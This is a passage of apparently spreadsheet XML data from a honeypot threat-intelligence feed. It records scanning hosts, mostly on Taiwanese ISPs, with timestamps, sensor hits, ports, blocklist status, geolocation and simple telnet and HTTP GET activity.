    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:1c1b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3862"/>
    <x v="3862"/>
    <s v="114-32-231-45.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T03:06:53"/>
    <d v="2024-04-11T09:24:00"/>
    <d v="2025-04-01T03:06:53"/>
    <n v="357"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;16209&amp;&amp;23&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Hsinchu City"/>
    <s v="Hsinchu"/>
    <s v="1675151"/>
    <s v="NA"/>
    <s v="24.8036"/>
    <s v="120.969"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:e72d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3863"/>
    <x v="3863"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T02:57:26"/>
    <d v="2023-07-24T20:07:32"/>
    <d v="2025-04-01T02:57:26"/>
    <n v="404900"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;56936&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:8775"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3864"/>
    <x v="3864"/>
    <s v="NA&amp;&amp;65-23-183-10-host.drtel.net"/>
    <x v="0"/>
    <d v="2025-04-01T02:54:56"/>
    <d v="2025-03-30T14:13:32"/>
    <d v="2025-04-01T02:54:56"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="ND"/>
    <s v="North Dakota"/>
    <s v="Dickey"/>
    <s v="Ellendale"/>
    <s v="5059052"/>
    <s v="58436"/>
    <s v="46.0195"/>
    <s v="-98.5253"/>
    <s v="32809"/>
    <s v="Dickey Rural Networks"/>
    <s v="Dickey Rural Networks"/>
    <s v="business"/>
    <s v="Dickey Rural Networks"/>
    <s v="2004-07-29"/>
    <s v="DRN-NET-01"/>
    <s v="2012-03-02"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-01-26 17:28:33"/>
    <s v="2026-01-26 17:28:33"/>
    <s v="2024-12-28 07:29:04"/>
    <s v="['NSA1.DRTEL.NET', 'NSA2.DRTEL.NET']"/>
    <s v="eNom, LLC"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="None"/>
    <x v="39"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:4117:b70a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3865"/>
    <x v="3865"/>
    <s v="59-127-5-6.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T02:46:57"/>
    <d v="2024-03-26T14:40:13"/>
    <d v="2025-04-01T02:46:57"/>
    <n v="463"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;20395&amp;&amp;23&amp;&amp;NA"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>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3b7f:506"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3866"/>
    <x v="3866"/>
    <s v="125-228-91-149.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T02:28:04"/>
    <d v="2024-09-11T09:31:00"/>
    <d v="2025-04-01T02:28:04"/>
    <n v="329"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;52890&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:5b95"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3867"/>
    <x v="3867"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T02:15:45"/>
    <d v="2024-06-04T16:40:00"/>
    <d v="2025-04-01T02:15:45"/>
    <n v="379"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;47187&amp;&amp;38861&amp;&amp;45940&amp;&amp;36602&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1182"/>
    <s v="120.679"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="TINP"/>
    <s v="residential"/>
    <s v="New Century InfoComm Tech. Co., Ltd."/>
    <s v="2011-04-07"/>
    <s v="NCICNET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a69:5df8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3868"/>
    <x v="3868"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T02:12:45"/>
    <d v="2025-03-31T23:26:28"/>
    <d v="2025-04-01T02:12:45"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:5473"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3869"/>
    <x v="3869"/>
    <s v="125-229-136-194.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:55:40"/>
    <d v="2023-07-30T06:52:45"/>
    <d v="2025-04-01T01:55:40"/>
    <n v="1472"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;7817&amp;&amp;23&amp;&amp;9100&amp;&amp;24932"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:88c2"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3870"/>
    <x v="3870"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:52:33"/>
    <d v="2024-05-27T16:40:55"/>
    <d v="2025-04-01T01:52:33"/>
    <n v="3100"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;40526&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="113"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KH"/>
    <s v="Cambodia"/>
    <s v="17"/>
    <s v="Siem Reap"/>
    <s v="Krong Siem Reab"/>
    <s v="Siem Reap"/>
    <s v="1822214"/>
    <s v="NA"/>
    <s v="13.3618"/>
    <s v="103.861"/>
    <s v="38623"/>
    <s v="VIETTEL (CAMBODIA) PTE., LTD"/>
    <s v="VIETTEL (CAMBODIA) PTE., LTD"/>
    <s v="business"/>
    <s v="Viettel (cambodia) Pte., Ltd."/>
    <s v="2011-03-10"/>
    <s v="VIETTEL-CAMBODIA"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2425:ddd5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3871"/>
    <x v="3871"/>
    <s v="59-126-252-210.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:42:45"/>
    <d v="2024-04-06T11:38:00"/>
    <d v="2025-04-01T01:42:45"/>
    <n v="649"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
